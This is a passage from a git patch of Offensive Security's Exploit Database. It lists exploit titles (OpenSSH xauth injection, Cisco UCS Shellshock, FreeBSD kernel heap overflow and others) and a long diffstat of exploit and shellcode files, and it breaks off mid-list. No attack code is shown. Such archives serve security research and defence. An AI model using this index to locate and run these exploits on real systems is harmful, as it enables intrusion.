From 477bcbdcc0f9e6163099d7623678a208e993e7d6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 17 Mar 2016 07:07:56 +0000 Subject: [PATCH] DB: 2016-03-17 5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow --- files.csv | 39 +- platforms/aix/local/1044.c | 6 +- platforms/aix/local/1045.c | 6 +- platforms/aix/local/1046.c | 6 +- platforms/aix/local/333.c | 6 +- platforms/aix/local/335.c | 6 +- platforms/aix/local/4231.c | 356 +- platforms/aix/local/4232.sh | 58 +- platforms/aix/local/4233.c | 314 +- platforms/aix/local/898.sh | 6 +- platforms/aix/local/9306.txt | 66 +- platforms/aix/shellcode/13241.txt | 4 +- platforms/asp/webapps/1010.pl | 6 +- platforms/asp/webapps/1011.php | 6 +- platforms/asp/webapps/1012.txt | 6 +- platforms/asp/webapps/1015.txt | 6 +- platforms/asp/webapps/1070.pl | 6 +- platforms/asp/webapps/1071.pl | 6 +- platforms/asp/webapps/1112.txt | 6 +- platforms/asp/webapps/1252.htm | 88 +- platforms/asp/webapps/1418.txt | 118 +- platforms/asp/webapps/1419.pl | 106 +- platforms/asp/webapps/1472.pl | 186 +- platforms/asp/webapps/1514.pl | 100 +- platforms/asp/webapps/1528.pl | 140 +- platforms/asp/webapps/1529.htm | 72 +- platforms/asp/webapps/1550.txt | 132 +- platforms/asp/webapps/1562.pl | 136 +- platforms/asp/webapps/1569.pl | 110 +- platforms/asp/webapps/1571.htm | 114 +- platforms/asp/webapps/1589.pl | 134 +- platforms/asp/webapps/1597.pl | 174 +- platforms/asp/webapps/1623.pl | 138 +- platforms/asp/webapps/1700.pl | 154 +- platforms/asp/webapps/1714.txt | 36 +- platforms/asp/webapps/1759.txt | 60 +- platforms/asp/webapps/1807.txt | 42 +- platforms/asp/webapps/1833.txt | 22 +- platforms/asp/webapps/1834.asp | 98 +- platforms/asp/webapps/1836.txt | 14 +- platforms/asp/webapps/1837.pl | 408 +- platforms/asp/webapps/1840.txt | 50 +- platforms/asp/webapps/1845.txt | 30 +- platforms/asp/webapps/1849.htm | 138 +- platforms/asp/webapps/1850.htm | 86 +- platforms/asp/webapps/1859.htm | 158 +- platforms/asp/webapps/1873.txt | 16 +- platforms/asp/webapps/1884.htm | 24 +- platforms/asp/webapps/1900.txt | 4 +- platforms/asp/webapps/1930.txt | 18 +- platforms/asp/webapps/1931.txt | 102 +- platforms/asp/webapps/1987.txt | 362 +- platforms/asp/webapps/2138.txt | 24 +- platforms/asp/webapps/2186.txt | 44 +- platforms/asp/webapps/2228.txt | 54 +- platforms/asp/webapps/2230.txt | 54 +- platforms/asp/webapps/2294.txt | 32 +- platforms/asp/webapps/2296.txt | 148 +- platforms/asp/webapps/2306.txt | 46 +- platforms/asp/webapps/2362.txt | 26 +- platforms/asp/webapps/2384.txt | 42 +- platforms/asp/webapps/2385.txt | 56 +- platforms/asp/webapps/2386.txt | 46 +- platforms/asp/webapps/2395.txt | 36 +- platforms/asp/webapps/2416.txt | 22 +- platforms/asp/webapps/2421.pl | 92 +- platforms/asp/webapps/2423.txt | 36 +- platforms/asp/webapps/2592.htm | 76 +- platforms/asp/webapps/2642.asp | 378 +- platforms/asp/webapps/2661.asp | 358 +- platforms/asp/webapps/2662.txt | 92 +- platforms/asp/webapps/2683.txt | 42 +- platforms/asp/webapps/2684.txt | 42 +- platforms/asp/webapps/2746.pl | 174 +- platforms/asp/webapps/2754.pl | 170 +- platforms/asp/webapps/2755.pl | 146 +- platforms/asp/webapps/2756.txt | 40 +- platforms/asp/webapps/2757.pl | 138 +- platforms/asp/webapps/2761.pl | 138 +- platforms/asp/webapps/2762.asp | 384 +- platforms/asp/webapps/2763.txt | 38 +- platforms/asp/webapps/2764.txt | 44 +- platforms/asp/webapps/2765.txt | 50 +- platforms/asp/webapps/2772.htm | 72 +- platforms/asp/webapps/2774.txt | 38 +- platforms/asp/webapps/2779.txt | 38 +- platforms/asp/webapps/2780.txt | 40 +- platforms/asp/webapps/2781.txt | 48 +- platforms/asp/webapps/2782.txt | 44 +- platforms/asp/webapps/2813.txt | 114 +- platforms/asp/webapps/2828.pl | 116 +- platforms/asp/webapps/2829.txt | 48 +- platforms/asp/webapps/2830.txt | 44 +- platforms/asp/webapps/2846.txt | 46 +- platforms/asp/webapps/2848.txt | 24 +- platforms/asp/webapps/2849.txt | 64 +- platforms/asp/webapps/2853.txt | 24 +- platforms/asp/webapps/2881.txt | 78 +- platforms/asp/webapps/2907.txt | 56 +- platforms/asp/webapps/2908.txt | 60 +- platforms/asp/webapps/2909.txt | 44 +- platforms/asp/webapps/2962.txt | 42 +- platforms/asp/webapps/2963.txt | 52 +- platforms/asp/webapps/2986.txt | 52 +- platforms/asp/webapps/2987.txt | 74 +- platforms/asp/webapps/2988.pl | 134 +- platforms/asp/webapps/2989.txt | 60 +- platforms/asp/webapps/2990.pl | 134 +- platforms/asp/webapps/2991.pl | 134 +- platforms/asp/webapps/2992.txt | 50 +- platforms/asp/webapps/2993.txt | 50 +- platforms/asp/webapps/2994.htm | 168 +- platforms/asp/webapps/2996.htm | 162 +- platforms/asp/webapps/2997.pl | 198 +- platforms/asp/webapps/2998.pl | 198 +- platforms/asp/webapps/3001.txt | 52 +- platforms/asp/webapps/3015.pl | 198 +- platforms/asp/webapps/3031.txt | 50 +- platforms/asp/webapps/3032.txt | 70 +- platforms/asp/webapps/3035.txt | 52 +- platforms/asp/webapps/3046.txt | 68 +- platforms/asp/webapps/3060.txt | 32 +- platforms/asp/webapps/3061.txt | 42 +- platforms/asp/webapps/3062.txt | 54 +- platforms/asp/webapps/3066.txt | 30 +- platforms/asp/webapps/3068.htm | 80 +- platforms/asp/webapps/3073.txt | 56 +- platforms/asp/webapps/3074.txt | 54 +- platforms/asp/webapps/3081.pl | 166 +- platforms/asp/webapps/3089.txt | 84 +- platforms/asp/webapps/3105.txt | 428 +- platforms/asp/webapps/3115.txt | 78 +- platforms/asp/webapps/3122.pl | 248 +- platforms/asp/webapps/3135.txt | 38 +- platforms/asp/webapps/3186.txt | 52 +- platforms/asp/webapps/3195.txt | 54 +- platforms/asp/webapps/3210.txt | 80 +- platforms/asp/webapps/3233.txt | 46 +- platforms/asp/webapps/3241.txt | 34 +- platforms/asp/webapps/3295.txt | 74 +- platforms/asp/webapps/3301.txt | 34 +- platforms/asp/webapps/3317.txt | 26 +- platforms/asp/webapps/3318.txt | 60 +- platforms/asp/webapps/3339.txt | 52 +- platforms/asp/webapps/3390.txt | 122 +- platforms/asp/webapps/3437.txt | 38 +- platforms/asp/webapps/3466.txt | 28 +- platforms/asp/webapps/3469.txt | 38 +- platforms/asp/webapps/3470.htm | 144 +- platforms/asp/webapps/3481.htm | 130 +- platforms/asp/webapps/3520.txt | 40 +- platforms/asp/webapps/3534.txt | 38 +- platforms/asp/webapps/3536.txt | 38 +- platforms/asp/webapps/3546.txt | 42 +- platforms/asp/webapps/3550.txt | 36 +- platforms/asp/webapps/3551.txt | 36 +- platforms/asp/webapps/3556.htm | 132 +- platforms/asp/webapps/3767.txt | 40 +- platforms/asp/webapps/3831.txt | 44 +- platforms/asp/webapps/3905.txt | 26 +- platforms/asp/webapps/3914.txt | 28 +- platforms/asp/webapps/3936.txt | 34 +- platforms/asp/webapps/4007.txt | 36 +- platforms/asp/webapps/4040.txt | 32 +- platforms/asp/webapps/4057.txt | 30 +- platforms/asp/webapps/4083.txt | 42 +- platforms/asp/webapps/4198.txt | 34 +- platforms/asp/webapps/4239.txt | 130 +- platforms/asp/webapps/4458.txt | 92 +- platforms/asp/webapps/4486.txt | 38 +- platforms/asp/webapps/4578.txt | 52 +- platforms/asp/webapps/4609.txt | 30 +- platforms/asp/webapps/4644.txt | 64 +- platforms/asp/webapps/4687.htm | 62 +- platforms/asp/webapps/4697.txt | 82 +- platforms/asp/webapps/4730.txt | 728 +- platforms/asp/webapps/4848.txt | 232 +- platforms/asp/webapps/4900.txt | 204 +- platforms/asp/webapps/4910.pl | 272 +- platforms/asp/webapps/4921.txt | 12 +- platforms/asp/webapps/4970.txt | 108 +- platforms/asp/webapps/4971.txt | 112 +- platforms/asp/webapps/4972.txt | 108 +- platforms/asp/webapps/4988.txt | 224 +- platforms/asp/webapps/5185.txt | 124 +- platforms/asp/webapps/5187.txt | 82 +- platforms/asp/webapps/5274.txt | 284 +- platforms/asp/webapps/5276.txt | 96 +- platforms/asp/webapps/5373.txt | 110 +- platforms/asp/webapps/5409.txt | 152 +- platforms/asp/webapps/5456.txt | 226 +- platforms/asp/webapps/5475.txt | 176 +- platforms/asp/webapps/5482.py | 308 +- platforms/asp/webapps/5503.txt | 134 +- platforms/asp/webapps/5507.txt | 186 +- platforms/asp/webapps/5553.txt | 76 +- platforms/asp/webapps/5556.txt | 89 +- platforms/asp/webapps/5564.txt | 146 +- platforms/asp/webapps/5608.txt | 116 +- platforms/asp/webapps/5633.pl | 286 +- platforms/asp/webapps/5705.txt | 128 +- platforms/asp/webapps/5717.txt | 50 +- platforms/asp/webapps/5753.txt | 50 +- platforms/asp/webapps/5763.txt | 76 +- platforms/asp/webapps/5765.txt | 80 +- platforms/asp/webapps/5780.txt | 60 +- platforms/asp/webapps/5781.txt | 76 +- platforms/asp/webapps/5805.txt | 66 +- platforms/asp/webapps/5849.txt | 138 +- platforms/asp/webapps/5894.txt | 58 +- platforms/asp/webapps/5912.txt | 54 +- platforms/asp/webapps/5927.txt | 60 +- platforms/asp/webapps/6104.pl | 196 +- platforms/asp/webapps/6105.pl | 208 +- platforms/asp/webapps/6119.txt | 38 +- platforms/asp/webapps/6135.txt | 40 +- platforms/asp/webapps/6405.txt | 46 +- platforms/asp/webapps/6420.txt | 106 +- platforms/asp/webapps/6453.txt | 84 +- platforms/asp/webapps/6470.txt | 116 +- platforms/asp/webapps/6610.txt | 106 +- platforms/asp/webapps/6720.txt | 46 +- platforms/asp/webapps/6725.txt | 44 +- platforms/asp/webapps/6731.txt | 58 +- platforms/asp/webapps/6810.txt | 104 +- platforms/asp/webapps/7067.txt | 34 +- platforms/asp/webapps/7120.txt | 70 +- platforms/asp/webapps/7141.txt | 208 +- platforms/asp/webapps/7259.txt | 94 +- platforms/asp/webapps/7274.txt | 84 +- platforms/asp/webapps/7275.txt | 86 +- platforms/asp/webapps/7276.txt | 84 +- platforms/asp/webapps/7277.txt | 84 +- platforms/asp/webapps/7280.txt | 90 +- platforms/asp/webapps/7282.txt | 90 +- platforms/asp/webapps/7283.txt | 84 +- platforms/asp/webapps/7287.txt | 86 +- platforms/asp/webapps/7292.txt | 62 +- platforms/asp/webapps/7295.txt | 136 +- platforms/asp/webapps/7316.txt | 64 +- platforms/asp/webapps/7325.txt | 108 +- platforms/asp/webapps/7326.txt | 104 +- platforms/asp/webapps/7340.txt | 48 +- platforms/asp/webapps/7348.txt | 56 +- platforms/asp/webapps/7349.txt | 64 +- platforms/asp/webapps/7350.txt | 84 +- platforms/asp/webapps/7353.txt | 40 +- platforms/asp/webapps/7356.txt | 74 +- platforms/asp/webapps/7357.txt | 60 +- platforms/asp/webapps/7359.txt | 46 +- platforms/asp/webapps/7360.txt | 48 +- platforms/asp/webapps/7361.txt | 50 +- platforms/asp/webapps/7370.txt | 72 +- platforms/asp/webapps/7371.txt | 38 +- platforms/asp/webapps/7372.txt | 38 +- platforms/asp/webapps/7373.txt | 104 +- platforms/asp/webapps/7376.txt | 38 +- platforms/asp/webapps/7378.txt | 70 +- platforms/asp/webapps/7390.txt | 60 +- platforms/asp/webapps/7391.txt | 60 +- platforms/asp/webapps/7398.txt | 72 +- platforms/asp/webapps/7412.txt | 60 +- platforms/asp/webapps/7413.pl | 88 +- platforms/asp/webapps/7414.txt | 58 +- platforms/asp/webapps/7415.txt | 54 +- platforms/asp/webapps/7416.txt | 54 +- platforms/asp/webapps/7419.txt | 116 +- platforms/asp/webapps/7420.txt | 50 +- platforms/asp/webapps/7423.txt | 84 +- platforms/asp/webapps/7424.txt | 84 +- platforms/asp/webapps/7425.txt | 84 +- platforms/asp/webapps/7427.txt | 54 +- platforms/asp/webapps/7428.txt | 54 +- platforms/asp/webapps/7429.txt | 52 +- platforms/asp/webapps/7436.txt | 38 +- platforms/asp/webapps/7438.txt | 56 +- platforms/asp/webapps/7440.txt | 116 +- platforms/asp/webapps/7446.txt | 32 +- platforms/asp/webapps/7447.txt | 36 +- platforms/asp/webapps/7450.txt | 38 +- platforms/asp/webapps/7462.txt | 62 +- platforms/asp/webapps/7466.txt | 26 +- platforms/asp/webapps/7468.txt | 28 +- platforms/asp/webapps/7469.txt | 28 +- platforms/asp/webapps/7470.txt | 28 +- platforms/asp/webapps/7471.txt | 28 +- platforms/asp/webapps/7472.txt | 28 +- platforms/asp/webapps/7484.txt | 88 +- platforms/asp/webapps/7485.txt | 90 +- platforms/asp/webapps/7486.txt | 92 +- platforms/asp/webapps/7488.txt | 26 +- platforms/asp/webapps/7491.txt | 34 +- platforms/asp/webapps/7495.txt | 64 +- platforms/asp/webapps/7499.txt | 50 +- platforms/asp/webapps/7508.txt | 54 +- platforms/asp/webapps/7534.txt | 40 +- platforms/asp/webapps/7599.txt | 52 +- platforms/asp/webapps/7609.txt | 44 +- platforms/asp/webapps/7610.txt | 46 +- platforms/asp/webapps/7613.txt | 66 +- platforms/asp/webapps/7627.txt | 56 +- platforms/asp/webapps/7665.txt | 134 +- platforms/asp/webapps/7666.txt | 52 +- platforms/asp/webapps/7744.txt | 74 +- platforms/asp/webapps/7752.txt | 52 +- platforms/asp/webapps/7754.txt | 60 +- platforms/asp/webapps/7761.txt | 74 +- platforms/asp/webapps/7766.txt | 62 +- platforms/asp/webapps/7767.txt | 84 +- platforms/asp/webapps/7768.txt | 60 +- platforms/asp/webapps/7769.txt | 60 +- platforms/asp/webapps/7770.txt | 60 +- platforms/asp/webapps/7771.txt | 60 +- platforms/asp/webapps/7772.txt | 58 +- platforms/asp/webapps/7773.txt | 90 +- platforms/asp/webapps/7774.txt | 90 +- platforms/asp/webapps/7782.txt | 60 +- platforms/asp/webapps/7783.txt | 60 +- platforms/asp/webapps/7784.txt | 58 +- platforms/asp/webapps/7788.txt | 40 +- platforms/asp/webapps/7789.txt | 48 +- platforms/asp/webapps/7791.txt | 54 +- platforms/asp/webapps/7800.txt | 60 +- platforms/asp/webapps/7801.txt | 60 +- platforms/asp/webapps/7802.txt | 64 +- platforms/asp/webapps/7803.txt | 70 +- platforms/asp/webapps/7816.txt | 76 +- platforms/asp/webapps/7850.txt | 46 +- platforms/asp/webapps/7861.txt | 66 +- platforms/asp/webapps/7872.txt | 125 +- platforms/asp/webapps/7924.txt | 132 +- platforms/asp/webapps/7963.txt | 76 +- platforms/asp/webapps/7981.txt | 60 +- platforms/asp/webapps/7982.txt | 58 +- platforms/asp/webapps/7991.txt | 34 +- platforms/asp/webapps/8048.txt | 82 +- platforms/asp/webapps/8065.txt | 40 +- platforms/asp/webapps/8070.txt | 88 +- platforms/asp/webapps/8107.txt | 92 +- platforms/asp/webapps/8109.txt | 96 +- platforms/asp/webapps/8110.txt | 96 +- platforms/asp/webapps/8111.txt | 100 +- platforms/asp/webapps/8113.txt | 94 +- platforms/asp/webapps/8130.txt | 108 +- platforms/asp/webapps/8131.txt | 94 +- platforms/asp/webapps/8132.txt | 92 +- platforms/asp/webapps/8307.txt | 84 +- platforms/asp/webapps/8379.txt | 58 +- platforms/asp/webapps/8397.txt | 134 +- platforms/asp/webapps/8528.txt | 62 +- platforms/asp/webapps/8529.txt | 66 +- platforms/asp/webapps/8530.htm | 104 +- platforms/asp/webapps/8596.pl | 140 +- platforms/asp/webapps/8627.txt | 50 +- platforms/asp/webapps/8705.txt | 54 +- platforms/asp/webapps/8726.txt | 40 +- platforms/asp/webapps/8734.txt | 44 +- platforms/asp/webapps/8749.txt | 48 +- platforms/asp/webapps/8756.txt | 70 +- platforms/asp/webapps/8785.txt | 54 +- platforms/asp/webapps/8849.txt | 66 +- platforms/asp/webapps/8859.txt | 58 +- platforms/asp/webapps/8889.txt | 102 +- platforms/asp/webapps/8890.txt | 86 +- platforms/asp/webapps/925.txt | 6 +- platforms/asp/webapps/9328.txt | 14 +- platforms/asp/webapps/9562.txt | 328 +- platforms/asp/webapps/9612.txt | 86 +- platforms/asp/webapps/9675.txt | 122 +- platforms/asp/webapps/9856.txt | 2 +- platforms/bsd/dos/1540.pl | 62 +- platforms/bsd/dos/2524.c | 28 +- platforms/bsd/dos/2541.c | 54 +- platforms/bsd/dos/2542.c | 32 +- platforms/bsd/dos/2639.c | 78 +- platforms/bsd/dos/343.c | 6 +- platforms/bsd/dos/4935.c | 128 +- platforms/bsd/dos/8581.txt | 284 +- platforms/bsd/dos/869.c | 6 +- platforms/bsd/local/118.c | 6 +- platforms/bsd/local/125.c | 6 +- platforms/bsd/local/200.c | 6 +- platforms/bsd/local/202.c | 6 +- platforms/bsd/local/207.c | 6 +- platforms/bsd/local/243.c | 6 +- platforms/bsd/local/3094.c | 266 +- platforms/bsd/local/396.c | 6 +- platforms/bsd/local/579.sh | 6 +- platforms/bsd/local/739.c | 6 +- platforms/bsd/remote/1234.c | 966 +- platforms/bsd/remote/228.c | 6 +- platforms/bsd/remote/234.c | 6 +- platforms/bsd/remote/409.c | 6 +- platforms/bsd/remote/432.c | 6 +- platforms/bsd/shellcode/13242.txt | 4 +- platforms/bsd_ppc/shellcode/13243.c | 4 +- platforms/bsd_x86/shellcode/13244.c | 88 +- platforms/bsd_x86/shellcode/13245.c | 222 +- platforms/bsd_x86/shellcode/13246.c | 4 +- platforms/bsd_x86/shellcode/13247.c | 4 +- platforms/bsd_x86/shellcode/13248.c | 4 +- platforms/bsd_x86/shellcode/13250.c | 4 +- platforms/bsd_x86/shellcode/13251.c | 4 +- platforms/bsd_x86/shellcode/13252.c | 4 +- platforms/bsd_x86/shellcode/13254.c | 4 +- platforms/bsd_x86/shellcode/13255.c | 4 +- platforms/bsd_x86/shellcode/13256.c | 4 +- platforms/bsdi_x86/shellcode/13257.txt | 4 +- platforms/bsdi_x86/shellcode/13258.txt | 4 +- platforms/bsdi_x86/shellcode/13260.c | 4 +- platforms/cgi/webapps/1039.pl | 6 +- platforms/cgi/webapps/1040.c | 6 +- platforms/cgi/webapps/1041.pl | 6 +- platforms/cgi/webapps/1048.pl | 6 +- platforms/cgi/webapps/1120.pl | 6 +- platforms/cgi/webapps/1194.c | 6 +- platforms/cgi/webapps/1236.pm | 378 +- platforms/cgi/webapps/1471.pl | 78 +- platforms/cgi/webapps/1508.pl | 172 +- platforms/cgi/webapps/1669.pl | 88 +- platforms/cgi/webapps/1670.pl | 96 +- platforms/cgi/webapps/1677.php | 292 +- platforms/cgi/webapps/1755.py | 262 +- platforms/cgi/webapps/179.c | 6 +- platforms/cgi/webapps/1862.c | 346 +- platforms/cgi/webapps/188.pl | 6 +- platforms/cgi/webapps/211.c | 6 +- platforms/cgi/webapps/2266.txt | 140 +- platforms/cgi/webapps/2267.txt | 228 +- platforms/cgi/webapps/242.pl | 6 +- platforms/cgi/webapps/289.pl | 6 +- platforms/cgi/webapps/3065.txt | 34 +- platforms/cgi/webapps/3412.txt | 128 +- platforms/cgi/webapps/4261.txt | 24 +- platforms/cgi/webapps/4264.txt | 74 +- platforms/cgi/webapps/4343.txt | 30 +- platforms/cgi/webapps/4529.txt | 72 +- platforms/cgi/webapps/464.txt | 6 +- platforms/cgi/webapps/4647.txt | 22 +- platforms/cgi/webapps/4977.txt | 96 +- platforms/cgi/webapps/53.c | 6 +- platforms/cgi/webapps/5304.txt | 18 +- platforms/cgi/webapps/5662.txt | 180 +- platforms/cgi/webapps/6108.pl | 192 +- platforms/cgi/webapps/6109.pl | 192 +- platforms/cgi/webapps/6110.pl | 192 +- platforms/cgi/webapps/6111.pl | 192 +- platforms/cgi/webapps/6269.txt | 122 +- platforms/cgi/webapps/642.pl | 6 +- platforms/cgi/webapps/6509.txt | 66 +- platforms/cgi/webapps/659.txt | 6 +- platforms/cgi/webapps/6771.txt | 86 +- platforms/cgi/webapps/6845.txt | 26 +- platforms/cgi/webapps/6864.txt | 46 +- platforms/cgi/webapps/7404.txt | 54 +- platforms/cgi/webapps/7753.pl | 106 +- platforms/cgi/webapps/8085.txt | 36 +- platforms/cgi/webapps/8086.txt | 38 +- platforms/cgi/webapps/8087.txt | 32 +- platforms/cgi/webapps/8247.txt | 328 +- platforms/cgi/webapps/862.txt | 6 +- platforms/cgi/webapps/8895.txt | 116 +- platforms/cgi/webapps/8987.txt | 70 +- platforms/cgi/webapps/9074.txt | 116 +- platforms/cgi/webapps/9140.txt | 14 +- platforms/cgi/webapps/9357.txt | 68 +- platforms/cgi/webapps/954.pl | 6 +- platforms/cgi/webapps/980.pl | 6 +- platforms/freebsd/dos/8259.c | 20 +- platforms/freebsd/dos/9134.c | 116 +- platforms/freebsd/dos/9206.c | 82 +- platforms/freebsd/dos/9373.c | 150 +- platforms/freebsd/local/7581.c | 288 +- platforms/freebsd/local/8261.c | 260 +- platforms/freebsd_x86-64/dos/39570.c | 227 + platforms/freebsd_x86-64/shellcode/13279.c | 110 +- platforms/freebsd_x86-64/shellcode/13280.c | 124 +- platforms/freebsd_x86/shellcode/13261.txt | 84 +- platforms/freebsd_x86/shellcode/13262.txt | 140 +- platforms/freebsd_x86/shellcode/13263.txt | 264 +- platforms/freebsd_x86/shellcode/13264.txt | 88 +- platforms/freebsd_x86/shellcode/13265.c | 202 +- platforms/freebsd_x86/shellcode/13266.asm | 138 +- platforms/freebsd_x86/shellcode/13269.c | 84 +- platforms/freebsd_x86/shellcode/13270.c | 366 +- platforms/freebsd_x86/shellcode/13271.c | 56 +- platforms/freebsd_x86/shellcode/13272.c | 76 +- platforms/freebsd_x86/shellcode/13274.c | 4 +- platforms/freebsd_x86/shellcode/13275.c | 4 +- platforms/freebsd_x86/shellcode/13276.c | 4 +- platforms/freebsd_x86/shellcode/13277.c | 4 +- platforms/generator/shellcode/13281.c | 386 +- platforms/generator/shellcode/13282.php | 128 +- platforms/generator/shellcode/13283.php | 128 +- platforms/generator/shellcode/13284.txt | 204 +- platforms/generator/shellcode/13285.c | 144 +- platforms/generator/shellcode/13286.c | 2722 ++-- platforms/generator/shellcode/13288.c | 362 +- platforms/hardware/dos/1153.pl | 6 +- platforms/hardware/dos/1338.pl | 214 +- platforms/hardware/dos/1411.pl | 48 +- platforms/hardware/dos/1447.c | 218 +- platforms/hardware/dos/1464.c | 206 +- platforms/hardware/dos/1473.c | 202 +- platforms/hardware/dos/1496.c | 374 +- platforms/hardware/dos/1551.txt | 28 +- platforms/hardware/dos/1718.pl | 138 +- platforms/hardware/dos/2000.pl | 92 +- platforms/hardware/dos/2059.cpp | 174 +- platforms/hardware/dos/2156.c | 450 +- platforms/hardware/dos/2176.html | 74 +- platforms/hardware/dos/262.pl | 6 +- platforms/hardware/dos/2700.rb | 330 +- platforms/hardware/dos/2915.c | 1496 +- platforms/hardware/dos/2961.py | 120 +- platforms/hardware/dos/3526.pl | 132 +- platforms/hardware/dos/3535.pl | 170 +- platforms/hardware/dos/358.txt | 6 +- platforms/hardware/dos/363.txt | 6 +- platforms/hardware/dos/3791.pl | 94 +- platforms/hardware/dos/3792.pl | 178 +- platforms/hardware/dos/4297.pl | 72 +- platforms/hardware/dos/4298.pl | 190 +- platforms/hardware/dos/4319.pl | 46 +- platforms/hardware/dos/4426.pl | 312 +- platforms/hardware/dos/4692.pl | 178 +- platforms/hardware/dos/4978.html | 68 +- platforms/hardware/dos/5054.c | 400 +- platforms/hardware/dos/59.c | 6 +- platforms/hardware/dos/60.c | 6 +- platforms/hardware/dos/6196.pl | 74 +- platforms/hardware/dos/62.sh | 6 +- platforms/hardware/dos/6394.pl | 182 +- platforms/hardware/dos/6582.pl | 88 +- platforms/hardware/dos/6726.txt | 206 +- platforms/hardware/dos/7220.txt | 32 +- platforms/hardware/dos/7535.php | 128 +- platforms/hardware/dos/7632.txt | 456 +- platforms/hardware/dos/7776.c | 376 +- platforms/hardware/dos/8008.txt | 146 +- platforms/hardware/dos/8051.html | 82 +- platforms/hardware/dos/8125.rb | 244 +- platforms/hardware/dos/8187.sh | 136 +- platforms/hardware/dos/8260.txt | 170 +- platforms/hardware/dos/8313.txt | 66 +- platforms/hardware/dos/8393.txt | 56 +- platforms/hardware/dos/8490.sh | 96 +- platforms/hardware/dos/856.c | 130 +- platforms/hardware/dos/8584.py | 148 +- platforms/hardware/dos/8964.txt | 88 +- platforms/hardware/dos/9067.py | 40 +- platforms/hardware/dos/9514.py | 366 +- platforms/hardware/dos/9646.php | 44 +- platforms/hardware/dos/9666.php | 38 +- platforms/hardware/local/8833.txt | 62 +- platforms/hardware/local/9688.txt | 62 +- platforms/hardware/remote/1333.pm | 512 +- platforms/hardware/remote/169.pl | 6 +- platforms/hardware/remote/1889.txt | 68 +- platforms/hardware/remote/2048.pl | 388 +- platforms/hardware/remote/2136.txt | 114 +- platforms/hardware/remote/2145.txt | 114 +- platforms/hardware/remote/254.c | 6 +- platforms/hardware/remote/2638.c | 466 +- platforms/hardware/remote/294.pl | 6 +- platforms/hardware/remote/3189.sh | 284 +- platforms/hardware/remote/3294.txt | 132 +- platforms/hardware/remote/39568.py | 65 + platforms/hardware/remote/425.c | 6 +- platforms/hardware/remote/4744.txt | 44 +- platforms/hardware/remote/4797.pl | 202 +- platforms/hardware/remote/4941.txt | 134 +- platforms/hardware/remote/5113.txt | 82 +- platforms/hardware/remote/5150.txt | 96 +- platforms/hardware/remote/5289.txt | 66 +- platforms/hardware/remote/5926.txt | 702 +- platforms/hardware/remote/6305.htm | 380 +- platforms/hardware/remote/6366.c | 494 +- platforms/hardware/remote/6476.html | 48 +- platforms/hardware/remote/6477.html | 52 +- platforms/hardware/remote/6532.py | 424 +- platforms/hardware/remote/6750.txt | 1016 +- platforms/hardware/remote/6899.txt | 244 +- platforms/hardware/remote/7055.txt | 34 +- platforms/hardware/remote/77.c | 6 +- platforms/hardware/remote/7712.txt | 88 +- platforms/hardware/remote/7845.txt | 174 +- platforms/hardware/remote/7915.txt | 54 +- platforms/hardware/remote/8022.txt | 32 +- platforms/hardware/remote/8023.txt | 68 +- platforms/hardware/remote/8096.txt | 126 +- platforms/hardware/remote/829.c | 6 +- platforms/hardware/remote/8316.txt | 82 +- platforms/hardware/remote/8359.py | 62 +- platforms/hardware/remote/8696.txt | 64 +- platforms/hardware/remote/8846.txt | 44 +- platforms/hardware/remote/8963.txt | 206 +- platforms/hardware/remote/9066.txt | 72 +- platforms/hardware/remote/9117.txt | 232 +- platforms/hardware/remote/9209.txt | 206 +- platforms/hardware/remote/9432.txt | 44 +- platforms/hardware/remote/9456.txt | 62 +- platforms/hardware/remote/9473.txt | 78 +- platforms/hardware/remote/9498.txt | 52 +- platforms/hardware/remote/9658.txt | 56 +- platforms/hardware/shellcode/13290.txt | 164 +- platforms/hardware/webapps/10276.txt | 104 +- platforms/hardware/webapps/10347.txt | 1 - platforms/hp-ux/dos/195.sh | 6 +- platforms/hp-ux/dos/212.c | 6 +- platforms/hp-ux/local/134.c | 6 +- platforms/hp-ux/local/199.c | 6 +- platforms/hp-ux/local/245.c | 6 +- platforms/hp-ux/local/2633.c | 112 +- platforms/hp-ux/local/2634.c | 114 +- platforms/hp-ux/local/2635.c | 130 +- platforms/hp-ux/local/2636.c | 136 +- platforms/hp-ux/local/482.c | 6 +- platforms/hp-ux/remote/1259.pm | 234 +- platforms/hp-ux/remote/1261.pm | 216 +- platforms/hp-ux/remote/977.c | 6 +- platforms/hp-ux/shellcode/13295.txt | 